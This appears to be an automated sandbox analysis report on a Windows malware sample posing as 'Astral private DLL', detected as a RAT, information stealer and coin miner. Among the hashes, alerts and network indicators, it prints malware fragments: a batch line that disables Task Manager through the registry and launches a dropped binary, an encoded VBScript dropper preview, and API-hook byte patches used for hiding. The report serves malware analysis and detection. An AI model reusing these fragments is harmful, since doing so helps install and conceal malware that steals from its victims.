                                                              Malicious:false
                                                              Preview:ktaOoGz5HWwFJvnO28XSAP3cfXPJrYfooWdk6czFnjgVbqWoHIFdWLMV08sQ1qNt1HbxRCSaJRobthAzAlBiSCRcKIu7tiO7VweTOjWF0pTEgvlS73PQppbz08mJSVqlDrF6DrkbO5smsN6Zgc90S7SqVpdP6Mwe9sAzppPQSyBt6zGmCNn0V0SFZZlXOVeBJNmAMHt1Mthe6itgi0Ms
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:ASCII text, with very long lines (999), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):999
                                                              Entropy (8bit):5.918176740237764
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:AD5B5213A651482FB9B589BF4EF4FF19
                                                              SHA1:55AD67C33FD18B41AB9A0BB46CC9FF8327059181
                                                              SHA-256:38365AC1905E0E5C306830DD4CB96C1D9223F9BF557F7A4D385791162A773EBD
                                                              SHA-512:2312F4CC13D09B946C1DD2F8F3DF709A7C14FCF2272720AA0E59D1401FBD5AFEABB7CBC418D6298F6E59BA6553E448BD629CC4B362DE6E9C33645D3A96D31E6D
                                                              Malicious:false
                                                              Preview:BnhIRt20ZHW2ZgaBlYPok8Qk21UfIBwE6dTxdAWLkNhrcFWdoRxnKKZCX7PaZXsXVS66NmhkBEEXbiIxf010NI3vDRZgu6wNeKWJJZQBuMlFGCkyyc4ig2JMYK35NA0FS03RL8oFkzFAgyoBqlsSBNrmAJv8gUytWgwQJTnzyz7qwJqkf1OlSiDFIRRCNpiQAWo9BY2W72dLQAz1dLcpFMaycrH2CkmIRrqZeqiH91oZE1yHbajBM3Kx5zhTQAUXQV4iUZWwmVqNiAul3AamBk5Xg3epJP08hQJs6PxBDwZ1N6O4E5aQjrVqZhBa5qnXfrpS1BonMYiPKEKkpjkNyjY05cTZNXGXJBVfQ6DDRxELIGfUWbvWGZi5SzXYsOZzSLFJsoTtfh6BfNry78CwmuRtdaNajpUCXP27AWlsHC0idgaEIiatLmMh4WpSa2J0M3nPVuxlXUoj4sQ6AJSAOl0uCUCoqTRP29Wj3KtXvzW18nnLFtRRjJmkC2NAsI4DDZr4WqD0Z5OYP9wZr0j7B9psWvgA6tpm5Sxj5tzZpb2o4OVDGyT1j7BEt8hkJD4qPlc6MNd7AJRkHBxIad3IayD8Qtz6LPPmhLYSvY13UV0Zpb7sKZKqJwQbiepcXhvv3oD5mfWBmAxE7nSzwHvwEjdu46uRsYfxjFfBXBGpCIDI8Le4M0qQv8qUKSBquFSNe9f2HQbuBFu6fVwsczE2rPCkYL0FAZ46z0n9qmw5Y5PpOuyzgSO5AafP74e6aWulLxGprxCzCJewAWWnXBjrL96ZUYBwH0fBKneboJHtQY216tOki0iYxCZL1qUTvQsLoclW248O4zbxGEdkJaNRRGOHOSk8yx79qqNdI1sn2Ud7llFwMuJVCa3hNdHjUAZH2bHZ19cRrkZ7mRgnNxvEnm7PwpQpuIS14WEJdp4MR2ncB6466eWgOVdQe2nMtxhjRhCQMXJi3jwv8fN0vTsPvvnj3yplCsceUDKe4ou
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):154
                                                              Entropy (8bit):5.692650849381572
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:88C4417F7296B71B27E3EFE87D826762
                                                              SHA1:5E484EDCC594B168083EABC35D17576BD3AE46E2
                                                              SHA-256:835C0125084789629E1CBBC47BACA7703220665ADB0999A9BCD69FC36123E946
                                                              SHA-512:850389E6323FDCA8498B8415BDC66A6A9BF31FF4FF72AD7EEFA9540F6B3B23476EBAA310ABE9A26E09BD68302721357B368FC610FBB1AE23B05DD3D408F0978F
                                                              Malicious:false
                                                              Preview:2XKoRqvU3Lr9QNyvaWII9UtTmzwgOJoTHlEvoBrtNT3E5eWi7YHs19Jhn0Cc4PFugY1pIDGZpY4qbpYHcNizB6cIbgIy8Oz8NIihnqZ4SrDcEdG8c49rqQtj5tNl5Raaj6cSH0ewxohU3AD8aKWEPHR7Z8
                                                              Process:C:\Users\user\AppData\Local\Temp\Astral private DLL.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):200
                                                              Entropy (8bit):5.221623538511648
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:705BBADBF818277DDD38AFA10533756B
                                                              SHA1:1D5FB39C2793854E8C7D848798E39C659AA3E22D
                                                              SHA-256:871EF6A27BC10A920CE0890B50BF9926B7DBD4EEA19A97A19BB837BE7A97E5F3
                                                              SHA-512:F8C46C4E4E31445A397AF9F437B86B15EDD48047C24F9C78F0E49EFA28EA293465CB7AEF242E71B2D127DEBA3827AEE8F00C7CC11085F8C05A771B1CFBF36C31
                                                              Malicious:false
                                                              Preview:%UDEt%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%ixLh%..%CnADjXQtb%"C:\containerperf/ServerComponenthostMonitorDll.exe"%cdaYrDokcPsL%
                                                              Process:C:\Users\user\AppData\Local\Temp\Astral private DLL.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):68597760
                                                              Entropy (8bit):0.38816501086795074
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:01287AA2A0B5D2178CB13C477A04DC21
                                                              SHA1:884039BF4A15A820073CEF5A7D2022A97EF93C8C
                                                              SHA-256:4AF6BBCFF1CD1386DD5023BFBF76E9C532C8F466563768D40459E5CE9A40A52B
                                                              SHA-512:641D8FA8F22C57282139DB3192A50C7B84DAD0E4987327AD728A89BF65D533955589A4ACB31B17179856A4A159F3E2EA105EAAC5A5B255BD3B8E3C9B97973911
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\containerperf\ServerComponenthostMonitorDll.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\containerperf\ServerComponenthostMonitorDll.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?:-g............................./... ...@....@.. ....................................@................................../..K....@.. ....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................./......H...........H................H.../.......................................0..........(.... ........8........E........)...N...*...8....(.... ....~y...{....:....& ....8....*(.... ....~y...{....9....& ....8....(.... ....~y...{l...9....& ....8y......0.......... ........8........E................9.......H.......8.......... ....8....8.... ....~y...{....9....& ....8....8.... ....8....~....(M... .... .... ....s....~....(Q....... ....~y...{....:W...& ....8L.......~....(U...~....(Y... .
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):68597760
                                                              Entropy (8bit):0.38816501086795074
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:01287AA2A0B5D2178CB13C477A04DC21
                                                              SHA1:884039BF4A15A820073CEF5A7D2022A97EF93C8C
                                                              SHA-256:4AF6BBCFF1CD1386DD5023BFBF76E9C532C8F466563768D40459E5CE9A40A52B
                                                              SHA-512:641D8FA8F22C57282139DB3192A50C7B84DAD0E4987327AD728A89BF65D533955589A4ACB31B17179856A4A159F3E2EA105EAAC5A5B255BD3B8E3C9B97973911
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?:-g............................./... ...@....@.. ....................................@................................../..K....@.. ....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................./......H...........H................H.../.......................................0..........(.... ........8........E........)...N...*...8....(.... ....~y...{....:....& ....8....*(.... ....~y...{....9....& ....8....(.... ....~y...{l...9....& ....8y......0.......... ........8........E................9.......H.......8.......... ....8....8.... ....~y...{....9....& ....8....8.... ....8....~....(M... .... .... ....s....~....(Q....... ....~y...{....:W...& ....8L.......~....(U...~....(Y... .
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):68597760
                                                              Entropy (8bit):0.38816501086795074
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:01287AA2A0B5D2178CB13C477A04DC21
                                                              SHA1:884039BF4A15A820073CEF5A7D2022A97EF93C8C
                                                              SHA-256:4AF6BBCFF1CD1386DD5023BFBF76E9C532C8F466563768D40459E5CE9A40A52B
                                                              SHA-512:641D8FA8F22C57282139DB3192A50C7B84DAD0E4987327AD728A89BF65D533955589A4ACB31B17179856A4A159F3E2EA105EAAC5A5B255BD3B8E3C9B97973911
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\containerperf\lsass.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\containerperf\lsass.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?:-g............................./... ...@....@.. ....................................@................................../..K....@.. ....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................./......H...........H................H.../.......................................0..........(.... ........8........E........)...N...*...8....(.... ....~y...{....:....& ....8....*(.... ....~y...{....9....& ....8....(.... ....~y...{l...9....& ....8y......0.......... ........8........E................9.......H.......8.......... ....8....8.... ....~y...{....9....& ....8....8.... ....8....~....(M... .... .... ....s....~....(Q....... ....~y...{....:W...& ....8L.......~....(U...~....(Y... .
                                                              Process:C:\Users\user\AppData\Local\Temp\Astral private DLL.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):230
                                                              Entropy (8bit):5.9048913247977834
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:3EF9810CEB57153AB80DD204F33E7F91
                                                              SHA1:3FD4057ECAD16CF11F2CAB6D0AD44BE3BD4B0E3F
                                                              SHA-256:D88A8B553F99F796C80A9E7CC41534B43FAB45C7B13FD1D52C9B580D541A272E
                                                              SHA-512:E65CAD2C807BF012D13842DAC72BD2436D182702FC7BB7FB212487B322A9442504A7C1F42DF57E760AC24C322B810BA8C2FFA616DD2ACDFB8098BDB5E8012FE9
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              Preview:#@~^zQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJmG.Ymkx.DanD6z&r_5F/or(.o:8nZH$K?+Eo0hYG*}.a\Op2Ws!(jLR8CDJSPZS,0C^/.JUEAAA==^#~@.
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):1.3486334609113004
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • VXD Driver (31/22) 0.00%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:AstralprivateDLL.exe.bin.exe
                                                              File size:68'917'713 bytes
                                                              MD5:c9f4668c97eb480751e1bbf6173fc4e1
                                                              SHA1:528deade2bc88cafc26f78f7c73490b66abdf370
                                                              SHA256:b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240
                                                              SHA512:dd1d2499a2fca08181e43ea53138b3001d5674f2197c8962681bea188a07687feeb19b5bb8fb35e2339739e7df7b2bc2b2166bf02733bb3cf01f90571f874f41
                                                              SSDEEP:196608:27H3VIb7wjJfQqkGCaG1R8uzSJzbwHyokFpz/ehFCIUmF4tDDnYdBaUqkM9h8:s6vwmRR85JPwHyjIgIPCRnYBY
                                                              TLSH:B8E73346095125D4F5107C74A14EF8EA9249BC535FA6BD308C23CAA88B3EDD3C7CAE97
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Q..................r...........u.......u...@..........................0v............................................
                                                              Icon Hash:1515d4d4442f2d2d
                                                              Entrypoint:0xb58900
                                                              Entrypoint Section:VyCxe
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:
                                                              Time Stamp:0x51BC99EC [Sat Jun 15 16:44:28 2013 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:0331ca1875ee1266bf09953125b712b1
                                                              Instruction
                                                              pushad
                                                              mov esi, 0042D015h
                                                              lea edi, dword ptr [esi-0002C015h]
                                                              push edi
                                                              or ebp, FFFFFFFFh
                                                              jmp 00007F38BCC6A9C2h
                                                              nop
                                                              nop
                                                              nop
                                                              nop
                                                              nop
                                                              nop
                                                              mov al, byte ptr [esi]
                                                              inc esi
                                                              mov byte ptr [edi], al
                                                              inc edi
                                                              add ebx, ebx
                                                              jne 00007F38BCC6A9B9h
                                                              mov ebx, dword ptr [esi]
                                                              sub esi, FFFFFFFCh
                                                              adc ebx, ebx
                                                              jc 00007F38BCC6A99Fh
                                                              mov eax, 00000001h
                                                              add ebx, ebx
                                                              jne 00007F38BCC6A9B9h
                                                              mov ebx, dword ptr [esi]
                                                              sub esi, FFFFFFFCh
                                                              adc ebx, ebx
                                                              adc eax, eax
                                                              add ebx, ebx
                                                              jnc 00007F38BCC6A9BDh
                                                              jne 00007F38BCC6A9DAh
                                                              mov ebx, dword ptr [esi]
                                                              sub esi, FFFFFFFCh
                                                              adc ebx, ebx
                                                              jc 00007F38BCC6A9D1h
                                                              dec eax
                                                              add ebx, ebx
                                                              jne 00007F38BCC6A9B9h
                                                              mov ebx, dword ptr [esi]
                                                              sub esi, FFFFFFFCh
                                                              adc ebx, ebx
                                                              adc eax, eax
                                                              jmp 00007F38BCC6A986h
                                                              add ebx, ebx
                                                              jne 00007F38BCC6A9B9h
                                                              mov ebx, dword ptr [esi]
                                                              sub esi, FFFFFFFCh
                                                              adc ebx, ebx
                                                              adc ecx, ecx
                                                              jmp 00007F38BCC6AA04h
                                                              xor ecx, ecx
                                                              sub eax, 03h
                                                              jc 00007F38BCC6A9C3h
                                                              shl eax, 08h
                                                              mov al, byte ptr [esi]
                                                              inc esi
                                                              xor eax, FFFFFFFFh
                                                              je 00007F38BCC6AA27h
                                                              sar eax, 1
                                                              mov ebp, eax
                                                              jmp 00007F38BCC6A9BDh
                                                              add ebx, ebx
                                                              jne 00007F38BCC6A9B9h
                                                              mov ebx, dword ptr [esi]
                                                              sub esi, FFFFFFFCh
                                                              adc ebx, ebx
                                                              jc 00007F38BCC6A97Eh
                                                              inc ecx
                                                              add ebx, ebx
                                                              jne 00007F38BCC6A9B9h
                                                              mov ebx, dword ptr [esi]
                                                              sub esi, FFFFFFFCh
                                                              adc ebx, ebx
                                                              jc 00007F38BCC6A970h
                                                              add ebx, ebx
                                                              jne 00007F38BCC6A9B9h
                                                              mov ebx, dword ptr [esi]
                                                              sub esi, FFFFFFFCh
                                                              adc ebx, ebx
                                                              adc ecx, ecx
                                                              add ebx, ebx
                                                              jnc 00007F38BCC6A9A1h
                                                              jne 00007F38BCC6A9BBh
                                                              mov ebx, dword ptr [esi]
                                                              sub esi, FFFFFFFCh
                                                              adc ebx, ebx
                                                              jnc 00007F38BCC6A996h
                                                              add ecx, 02h
                                                              cmp ebp, FFFFFB00h
                                                              adc ecx, 02h
                                                              lea edx, dword ptr [eax+eax]
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x7627d40x118.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x7590000x97d4.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              00x10000x2c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              VyCxe0x2d0000x72c0000x72bc00d4b04e79e6484abb2a63eb948d899d48unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x7590000xa0000x9a000fad61f4873fbeca68543a116405fe6aFalse0.6449624594155844data6.591003767892076IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0x75926c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                              RT_ICON0x7597d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                              RT_ICON0x75a0840xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                              RT_ICON0x75af300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                              RT_ICON0x75b39c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                              RT_ICON0x75c4480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                              RT_ICON0x75e9f40x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                              RT_RCDATA0x1a74c0x1fa101empty0
                                                              RT_RCDATA0x2148500x538657data0.9822969436645508
                                                              RT_RCDATA0x74cea80xa2data1.0679012345679013
                                                              RT_GROUP_ICON0x76276c0x68data0.7019230769230769
                                                              DLLImport
                                                              KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                                              shlwapi.dllPathFindFileNameA
                                                              user32.dllLoadIconA
                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2025-01-13T13:41:33.872716+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44988837.44.238.25080TCP
                                                              2025-01-13T13:42:25.314532+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.4492411.1.1.153UDP
                                                              2025-01-13T13:42:27.409891+01002054247ET MALWARE SilentCryptoMiner Agent Config Inbound1104.20.4.235443192.168.2.449927TCP
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jan 13, 2025 13:42:25.314532042 CET4924153192.168.2.41.1.1.1
                                                              Jan 13, 2025 13:42:25.322561026 CET53492411.1.1.1192.168.2.4
                                                              Jan 13, 2025 13:42:26.415559053 CET5167753192.168.2.41.1.1.1
                                                              Jan 13, 2025 13:42:26.422403097 CET53516771.1.1.1192.168.2.4
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Jan 13, 2025 13:42:25.314532042 CET192.168.2.41.1.1.10x4316Standard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                              Jan 13, 2025 13:42:26.415559053 CET192.168.2.41.1.1.10xcae2Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Jan 13, 2025 13:40:25.001884937 CET1.1.1.1192.168.2.40xa93dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                              Jan 13, 2025 13:40:25.001884937 CET1.1.1.1192.168.2.40xa93dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                              Jan 13, 2025 13:42:25.322561026 CET1.1.1.1192.168.2.40x4316No error (0)pool.hashvault.pro192.248.189.11A (IP address)IN (0x0001)false
                                                              Jan 13, 2025 13:42:25.322561026 CET1.1.1.1192.168.2.40x4316No error (0)pool.hashvault.pro80.240.16.67A (IP address)IN (0x0001)false
                                                              Jan 13, 2025 13:42:26.422403097 CET1.1.1.1192.168.2.40xcae2No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                              Jan 13, 2025 13:42:26.422403097 CET1.1.1.1192.168.2.40xcae2No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                              Jan 13, 2025 13:42:26.422403097 CET1.1.1.1192.168.2.40xcae2No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false

                                                              Code Manipulations

                                                              Function NameHook TypeActive in Processes
                                                              ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                              NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                              ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                              NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                              ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                              NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                              NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                              ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                              ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                              NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                              RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                              NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                              NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                              ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                              ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                              Function NameHook TypeNew Data
                                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                              Function NameHook TypeNew Data
                                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:07:40:07
                                                              Start date:13/01/2025
                                                              Path:C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exe"
                                                              Imagebase:0x400000
                                                              File size:68'917'713 bytes
                                                              MD5 hash:C9F4668C97EB480751E1BBF6173FC4E1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1717902037.0000000003033000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:07:40:10
                                                              Start date:13/01/2025
                                                              Path:C:\Users\user\AppData\Local\Temp\Astral private DLL.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Astral private DLL.exe"
                                                              Imagebase:0x160000
                                                              File size:68'919'754 bytes
                                                              MD5 hash:C28FADCE847B20E2442ABA2F2F9F5699
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1728765563.0000000006653000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1729671319.000000000665D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exe, Author: Joe Security
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 62%, ReversingLabs
                                                              • Detection: 43%, Virustotal, Browse
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:07:40:11
                                                              Start date:13/01/2025
                                                              Path:C:\Users\user\AppData\Local\Temp\twain_32.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\twain_32.exe"
                                                              Imagebase:0x7ff795970000
                                                              File size:6'007'384 bytes
                                                              MD5 hash:1FF26B7D334CD22E726CAF72A4208B96
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
